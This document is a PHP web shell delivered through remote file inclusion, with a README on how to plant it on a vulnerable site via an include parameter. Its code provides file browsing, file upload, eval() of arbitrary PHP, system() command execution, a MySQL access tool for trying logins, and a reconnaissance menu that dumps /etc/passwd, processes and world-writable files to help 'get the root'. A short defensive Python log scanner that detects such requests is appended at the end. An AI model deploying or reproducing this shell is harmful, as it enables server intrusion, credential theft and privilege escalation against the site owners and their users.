<?
$site="http://membres.lycos.fr/newbie2323/explorerv1_5.txt"; // Where this exploit is located, e.g. www.dumbman.com/lolage/file.txt. The file can have any name or extension. Modify it as necessary.
if(!$variable){
$variable="page"; // Inclusion variable of the vulnerable site, e.g. http://vulnerable_site/wall.php?page=index.htm : here "page" is the variable used for inclusion. Modify it as necessary.
}
/* EXPLORER v1.4 - Modified - GET THE ROOT !
------------------------
PHP include vulnerability exploit for exploring purposes... Hum, no, sorry. For TESTING purposes ONLY.
Version : 1.4 - Modified version
Original version by : LostNoobs, www.security-challenge.com
Modified by : Clad Strife
France
------------------------
This exploit allows you to :
- Browse the server Hard Disk
- Upload files on the server
- Execute Unix or DOS commands
- Execute PHP
What is new with this modified version :
- Scan for non-protected files or directories you could write to. Only for UNIX-type servers.
- MySQL communication interface.
- Interface to the usual UNIX system commands, to make a system overview easier
- Exploit rewritten in english
- Exploit has a better look and feel
To come :
- Backdoor creation on the server
- Scan of vulnerable files with include vulnerability
------ README :
E.g. :
http://www.vulnerable_site.com/wall.php?page=http://www.mysite.com/explorer.txt
More :
http://www.vulnerable_site.com is the vulnerable site
http://www.site_faillible.com/include.php?page=variable is the webpage where the include call is. If include.php contains an include($page.".txt"); it only includes files ending with the .txt extension, so you have to rename your file accordingly.
http://www.mysite.com this is your site
http://www.mysite.com/explorer.txt (or any other extension) is the address where this exploit is located.
You have to modify the script to make it work properly.
Now your script should be ready for action. Try it by using : http://www.vulnerable_site.com/wall.php?page=http://www.mysite.com/explorer.txt
*/
$view_readme = 1; // Set to 1 if you checked the readme.
if($view_readme == 0)
{
printf("You should look at the README written inside this exploit if you want to unlock it !");
exit;
}
# Here the exploit code begins !
echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=upload&variable='.$variable.'" > Upload a file.</a><br><br> ');
echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=explfopen&variable='.$variable.'" > Explore with fopen() function.</a><br><br>');
echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=execphp&variable='.$variable.'" > Execute arbitrary PHP functions.</a><br><br>');
if(system("echo '<font color=red >PHP system() function is working properly. The following features should work :</font>'"))
{
echo(' <br><br><a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=system&variable='.$variable.'" > Execute a system() command.</a><br><br>');
echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=execsql&variable='.$variable.'">
Manager for SQL Server</a><br><br>');
echo(' <a href="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=overview&variable='.$variable.'">System overviewer (get the root !)</a><br><br>');
}
echo('<font size=-2>Include Exploit v1.4 - modified<br>Original authors : LostNoobs.<br>Modified by : Clad Strife.</font>');
###
#
# (New feature) SQL Manager
#
###
if($option=="execsql")
{
// A little about this feature.
echo("
<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=execsql&variable=".$variable."\" METHOD=POST><hr><br><br>
From here you can try to manage a local or remote mysqld server. If you have some logins and passwords to try on the SQL server, you can start from here.<bR><br>
In fact you could also use system() to exec the local mysql client, but the command line gets too long and is not easy to edit that way. This is why I made this query manager.<br><br>
You need a valid username/password to get into a local or remote database. Connections to a remote one may be filtered, so don't get nervous about connection errors. Note that this feature doesn't use the usual mysql PHP functions, because the vulnerable page through which this exploit is served could create some problems. It uses the usual mysql client on *nix systems. The execution time of the client should be short enough not to be noticed.
");
// Here starts the manager :
echo("
<br><br><hr><br><br>
Enter the name of the mysql client binary (default : mysql):<br>
<input name=\"sql_client\" type=\"text\" value=\"mysql\">
<br><br>Enter the login (default : root, but you can change it):<br>
<input name=\"sql_login\" type=\"text\" value=\"root\">
<br><br>Enter the password (\"none\" is only if no password is needed): <br>
<input name=\"sql_password\" type=\"text\" value=\"none\">
<br><br>Enter the address of the target. \"localhost\" is probably what you are looking for; try 127.0.0.1 if it doesn't work. Enter a valid IP address or hostname for a remote connection :<br>
<input name=\"sql_host\" type=\"text\" value=\"Provide a target\">
<bR><br>Enter any other optional arguments for the mysql client. This field only exists to pass extra client options. E.g. : if you want to connect on a specific port, write : \"--port=3306\". If you are unsure what to do, leave it blank :<br>
<input name=\"sql_options\" type=\"text\" value=\"\">
<br><br>Enter valid SQL queries. You can try \"SHOW DATABASES;\" first (default) and then run commands such as \"USE BASE1; SHOW TABLES;\". You can edit on multiple lines :<br>
<TEXTAREA name=\"sql_query\" ROWS=10 COLS=35>SHOW DATABASES;
# USE database_name; SHOW TABLES;
# SELECT * FROM table_name;</TEXTAREA>
<br><br><input name=\"submit\" type=\"submit\" value=\"Send !\">
<br><br><hr>
</font></form>
");
}
if($sql_client)
{
if ($sql_host == "Provide a target") // This checks that a target is set
{
echo("Please provide a valid target."); // No target is set
}
else if($sql_password == "none") // Ok for target, processing if no password is set
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : $system_cmd :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------
");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one
echo("</TEXTAREA>");
} // End of else if for no password option
else // processing when target is ok and when a password is provided
{
$sql_exec_option = "--execute=\"$sql_query\"";
$system_cmd="$sql_client --user=$sql_login --password=$sql_password --host=$sql_host $sql_options $sql_exec_option";
$system_cmd=str_replace("\\\"","\"",$system_cmd);
$system_cmd=str_replace("\\'","'",$system_cmd);
echo("<br><br>Results for query : $system_cmd :<br><br><TEXTAREA COLS=100 ROWS=40>\"SQL query \"$sql_query\" results :
------------------------------------------------------------
");
system($system_cmd,$var);
if($var != 0){
system($system_cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one
echo("</TEXTAREA>");
} // end of else
} // end of if
###
#
# (New feature) System overview utility
#
###
if($option=="overview")
{
echo('<br><br><hr><br>From here you will be able to execute many predefined commands which gather information about the system itself. This has been designed to make it easier to catch the root account. GET THE ROOT ! Wh00h00 !!<br><br>The more commands you select, the longer the loading time you have to expect. Do not worry if the webpage is still loading. Some specific UNIX commands may not work properly, because the command options in this file are designed for GNU/LINUX systems.<br><br><hr><br><br>');
echo('
<FORM ENCTYPE="multipart/form-data" ACTION="'.$PHP_SELF.'?'.$variable.'='.$site.'&option=overview&variable='.$variable.'" METHOD=POST>
About processes :<br>
<INPUT TYPE="checkbox" name="procroot" VALUE="y"> What are the processes executed by root ?<br>
<INPUT TYPE="checkbox" name="procall" VALUE="y"> What are all running processes ?<br><br><br>
About the system :<br>
<INPUT TYPE="checkbox" name="uname" VALUE="y"> Print certain system information.<br>
<INPUT TYPE="checkbox" name="catversion" VALUE="y"> What is the kernel version ?<br>
<INPUT TYPE="checkbox" name="mount" VALUE="y"> Where are the mounted filesystems ?<br>
<INPUT TYPE="checkbox" name="id" VALUE="y"> Which user is running this httpd server ?<br>
<INPUT TYPE="checkbox" name="who" VALUE="y"> Who is currently connected to the system ?<br>
<INPUT TYPE="checkbox" name="last" VALUE="y"> Give me the logins and hostnames of all last connected users.<br>
<INPUT TYPE="checkbox" name="modules" VALUE="y"> What are the running modules ?<br>
<INPUT TYPE="checkbox" name="hardware" VALUE="y"> Collect hardware information (is it really useful ?)<br>
<INPUT TYPE="checkbox" name="network" VALUE="y"> Extract the network configuration<br>
<br>Collect data in files :<br>
<INPUT TYPE="radio" name="passwd" value="yfull"> Get all the /etc/passwd.<br>
<INPUT TYPE="radio" name="passwd" value="yshell"> Grab only users with a shell access.<br>
<INPUT TYPE="checkbox" name="group" value="y"> What are the available groups ?<br>
<INPUT TYPE="checkbox" name="resolv" value="y"> Which DNS servers are used by this server ?<br><br>
Miscellaneous :<br>
<INPUT TYPE="radio" name="bcheck" value="big"> BIG CHECK<br>
It checks for non write-protected files. This feature may slow down page loading, sometimes so much that it is not possible to continue. Try the small check first before trying this one.<br>
<INPUT TYPE="radio" name="bcheck" value="small"> SMALL CHECK<br>
It checks for non-write protected files in /tmp and /home only. May not be exhaustive.<br>
<INPUT TYPE="checkbox" name="dirs" value="y"> + DIRECTORIES<br>
This checks for non-protected directories. It is only used together with a SMALL or BIG CHECK, and it increases the total search time.<br><br>
<INPUT TYPE="submit" name="Submit" Value="Nuke !"></form><br><br><hr>');
if($Submit)
{
echo ('<br><TEXTAREA COLS=110 ROWS=40>Text output for all selected options. For each one you first get the command that was run, then its output.
----------------------------------------------------------------------------->
');
// Here will start the output for each selected command.
///////////////////
if($procroot)
{
echo('
Processes launched by the root :
ps aux | grep root
--------------------------------
');
system("ps aux | grep root",$var);
if($var != 0){
echo("failed");}
}
//////////////////
//////////////////
if($procall)
{
echo('
Processes currently running :
ps aux
-----------------------------
');
system("ps aux",$var);
if($var != 0){
echo("failed");}
//////////////////
}
//////////////////
if($uname)
{
echo('
Certain system information :
uname -a
----------------------------
');
system("uname -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($catversion)
{
echo('
Kernel version :
cat /proc/version
-----------------
');
system("cat /proc/version",$var);
if($var != 0){
echo("failed");}
}
/////////////////
/////////////////
if($mount)
{
echo('
Show the mounted partitions :
mount
-----------------------------
');
system("mount",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($id)
{
echo('
Which user is running this server :
id
-----------------------------------
');
system("id",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($who)
{
echo('
Who is connected :
who
------------------
');
system("who",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($last)
{
echo('
Who are the last connected users :
last -a
----------------------------------
');
system("last -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($modules)
{
echo('
Running modules :
cat /proc/modules
-----------------
');
system("cat /proc/modules",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($hardware)
{
echo('
About Hardware :
cat /proc/cpuinfo
-----------------
');
system("cat /proc/cpuinfo",$var);
if($var != 0){
echo("failed");}
echo('
About Hardware :
cat /proc/pci
----------------
');
system("cat /proc/pci",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($network)
{
echo('
Network configuration :
ifconfig -a
-----------------------
');
system("ifconfig -a",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($passwd == "yfull")
{
echo('
Whole /etc/passwd :
cat /etc/passwd
-------------------
');
system("cat /etc/passwd",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($passwd == "yshell")
{
echo('
Current accounts with a shell :
cat /etc/passwd | grep /bin/sh ;
cat /etc/passwd | grep /bin/bash ;
cat /etc/passwd | grep /bin/tcsh ;
----------------------------------
');
system("cat /etc/passwd | grep /bin/sh ; cat /etc/passwd | grep /bin/bash ; cat /etc/passwd | grep /bin/tcsh;true",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($passwd == "yfull")
{
echo('
Full /etc/passwd :
cat /etc/passwd
-----------------
');
system("cat /etc/passwd",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($group)
{
echo('
Current groups :
cat /etc/group
-----------------
');
system("cat /etc/group",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($resolv)
{
echo('
DNS used for resolution :
cat /etc/resolv.conf
-------------------------
');
system("cat /etc/resolv.conf",$var);
if($var != 0){
echo("failed");}
}
//////////////////
/////////////////
if($bcheck == "big")
{
echo('
Non-protected files on the whole system :
find / -type f -perm 777
-----------------------------------------
');
system("find / -type f -perm 777",$var);
if($var != 0){
echo("failed");}
if($dirs) //may also check for non protected directories
{
echo('
Non-protected directories on the whole system :
find / -type d -perm 777
-----------------------------------------------
');
system("find / -type d -perm 777",$var);
if($var != 0){
echo("failed");}
}
}
//////////////////
/////////////////
if($bcheck == "small")
{
echo('
Non-protected files on /tmp and /home :
find /home -type f -perm 777;
find /tmp -type f -perm 777
---------------------------------------
');
system("find /home -type f -perm 777 ; find /tmp -type f -perm 777",$var);
if($var != 0){
echo("failed");}
if($dirs) //may also check for non protected directories
{
echo('
Non-protected directories on /home and /tmp :
find /home -type d -perm 777;
find /tmp -type d -perm 777
---------------------------------------------
');
system("find /home -type d -perm 777 ; find /tmp -type d -perm 777",$var);
if($var != 0){
echo("failed");}
}
}
//////////////////
echo('
End of report.
</TEXTAREA><br>');
} // end of if($Submit)
} // end of if option = overview
###
#
# PHP Execution part ------------------------
#
###
if($option=="execphp"){
echo("
<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=execphp&variable=".$variable."\" METHOD=POST><hr><br><br>
Edit PHP code to execute. (e.g.: phpinfo(); echo(\"toto\"); ):<br>
<TEXTAREA name=\"cmd0\" ROWS=15 COLS=50></TEXTAREA>
<br><br>
<input type=\"SUBMIT\" value=\"Execute !\" name=\"SUBMIT\">
</font>
</form>
");
if($cmd0){
$cmd0=str_replace("\\\"","\"",$cmd0);
$cmd0=str_replace("\\'","'",$cmd0);
echo("<br><br><hr><br><br>\"$cmd0\" results :<br><br>");
eval($cmd0);
echo("<br><br><hr><br><br>");
}
}
###
#
# System command part -----------------
#
###
if($option=="system"){
echo("
<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=system&variable=".$variable."\" METHOD=POST><hr><br><bR>
Choose a system command to execute with system() function :
<br>
<input name=\"cmd\" type=\"text\" value=\"\" size=40>
<br>
<br>
<input type=\"SUBMIT\" value=\"Execute !\" name=\"SUBMIT\">
</font>
</form>
");
if($cmd){
$cmd=str_replace("\\\"","\"",$cmd);
$cmd=str_replace("\\'","'",$cmd);
echo("<br><br><hr><br><br>Results for command $cmd :<br><br>");
echo "<form><textarea cols=100 rows=40>\"$cmd\" results :
-----------------------------------------
";
system($cmd,$var); // Output command in the textarea
if($var != 0){
system($cmd . " 1> /tmp/.output.txt 2>&1; cat /tmp/.output.txt rm /tmp/.output.txt"); } // print the error if there is one
echo "</textarea></form>";
}
echo("<br><br><hr><br><br><br>");
}
###
#
# Upload part ------------------
#
###
if($option=="upload"){
echo("
<FORM ENCTYPE=\"multipart/form-data\" ACTION=\"".$PHP_SELF."?".$variable."=".$site."&option=upload&variable=".$variable."\" METHOD=POST><hr><br><br>
Choose the file on your computer that you want to upload :<br>
<input name=\"FileName\" type=\"FILE\" value=\"\" size=70>
<br><br>
Choose the remote location where you want the file to be stored. Provide a path ending with the file name (e.g. : /tmp/.myfile) :<br>
<input name=\"path\" type=\"text\" value=\"\" size=70>
<br>
<br>
<input type=\"SUBMIT\" value=\"Upload it !\" name=\"SUBMIT\">
</font>
</form>
");
if($FileName){
if ( !copy($FileName, $path)){
print("<br><br><hr><br><br>The upload of $FileName to $path failed...<br>\n");
}else{
echo("<br><br><hr><br><br>Upload Successful !");
}
}
}
###
#
# Explorer part --------------------
#
###
if($option=="explfopen"){
function output( $mode )
{
/* The file type lives in the top four bits of st_mode; a plain bitwise AND
against overlapping masks (0x6000, 0xA000, 0xC000...) misreports block
devices, symlinks and sockets, so compare the masked value instead. */
switch( $mode & 0xF000 )
{
case 0x1000: $type='p'; break; /* FIFO pipe */
case 0x2000: $type='c'; break; /* Character special */
case 0x4000: $type='d'; break; /* Directory */
case 0x6000: $type='b'; break; /* Block special */
case 0x8000: $type='-'; break; /* Regular */
case 0xA000: $type='l'; break; /* Symbolic Link */
case 0xC000: $type='s'; break; /* Socket */
default: $type='u'; /* UNKNOWN */
}
/* Determine permissions */
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
/* Adjust for SUID, SGID and sticky bit */
if( $mode & 0x800 )
$owner["execute"] = ($owner["execute"]=='x') ? 's' : 'S';
if( $mode & 0x400 )
$group["execute"] = ($group["execute"]=='x') ? 's' : 'S';
if( $mode & 0x200 )
$world["execute"] = ($world["execute"]=='x') ? 't' : 'T';
printf("%1s", $type);
printf("%1s%1s%1s", $owner["read"], $owner["write"], $owner["execute"]);
printf("%1s%1s%1s", $group["read"], $group["write"], $group["execute"]);
printf("%1s%1s%1s\n", $world["read"], $world["write"], $world["execute"]);
}
if($fichier)
{
echo "<form><textarea cols=100 rows=40>";
$fp = fopen ($rep."/".$fichier, "r");
$i=1;
while (!feof($fp))
{
$buffer=fgets($fp,4096);
$buffer=str_replace(chr(10),"",$buffer);
$buffer=str_replace(chr(13),"",$buffer);
echo $buffer."\n";
}
fclose ($fp);
echo "</textarea></form>";
}
else {
if(!$rep)
$rep="./"; // initial path location
echo("<br><br><hr><br><br>");
if($rep == "./../../../../../../../../../../../../")
{
echo("You are in the root FileSystem.<br><br>");
}
$directory = opendir($rep);
while ($entree = readdir($directory)) {
if ($entree != "." && $entree != "..")
$tFichiers[] = filemtime($rep.$entree)."?".$entree."?".is_file($rep.$entree)."?".fileowner($rep.$entree);
}
closedir($directory);
rsort($tFichiers);
for ($cpt = 0; $cpt < sizeof($tFichiers); $cpt++) {
$tVals = explode("?", $tFichiers[$cpt]);
if($tVals[2]==0)
{
$link=$rep.$tVals[1]."/";
echo "[".date("Y-m-d H:i",$tVals[0])."] <a href=$PHP_SELF?".$variable."=".$site."&rep=".$link."&option=explfopen&variable=".$variable.">".$tVals[1]."</a><BR>\n";
}
else{
$link=$rep."&fichier=".$tVals[1];
output(fileperms($rep.$tVals[1])); // use this iteration's entry, not the stale readdir() value left over from the loop above
echo "[".date("Y-m-d H:i",$tVals[0])."] <a href=$PHP_SELF?".$variable."=".$site."&rep=".$link."&option=explfopen&variable=".$variable.">".$tVals[1]."</a> $tVals[3]<BR>\n"; }
}
}
}
?>
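The README above describes the request shape this exploit depends on: an include parameter (here `page`) carrying a remote URL, followed by `option=` values naming the shell's menus. As an added defensive example that is not part of the original script, the Python below flags both patterns in web server access logs; the log lines are constructed, and the combined-log layout and the option names taken from the script are the only assumptions.

```python
"""Flag remote-file-inclusion attempts and this shell's menu options in access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Menu values the explorer script appends to its own links (taken from the script above).
SHELL_OPTIONS = {"upload", "explfopen", "execphp", "system", "execsql", "overview"}

# Remote schemes and PHP stream wrappers that an include() parameter should never carry.
URL_SCHEME_RE = re.compile(r"^(?:https?|ftp|php|data)://", re.IGNORECASE)

# Assumed combined log format: client, identd, user, [timestamp], "request", status, bytes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def analyse_request(path):
    """Return the reasons a request path looks like an RFI/shell request (empty if clean)."""
    reasons = []
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    for name, values in query.items():
        for value in values:
            if URL_SCHEME_RE.match(value):
                reasons.append(f"remote URL in parameter '{name}'")
            if name == "option" and value in SHELL_OPTIONS:
                reasons.append(f"shell menu option '{value}'")
    return reasons


def scan_log(lines):
    """Yield (client, timestamp, path, reasons) for each suspicious log line."""
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        client, stamp, _method, path, _status = match.groups()
        reasons = analyse_request(path)
        if reasons:
            yield client, stamp, path, reasons


# Constructed sample: one benign visitor and one client pulling the shell in via ?page=
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wall.php?page=index.htm HTTP/1.1" 200 1043
203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /wall.php?page=http://203.0.113.9/explorer.txt HTTP/1.1" 200 2210
203.0.113.7 - - [10/Oct/2023:13:56:09 +0000] "POST /wall.php?page=http://203.0.113.9/explorer.txt&option=system&variable=page HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:57:00 +0000] "GET /wall.php?page=about.htm HTTP/1.1" 200 980
"""

if __name__ == "__main__":
    for client, stamp, path, reasons in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{stamp} {client} {path}\n    " + "; ".join(reasons))
```

The same `analyse_request` check, applied server-side before any `include()`, is the reason an allowlist of local page names (and `allow_url_include=Off`) closes this class of bug.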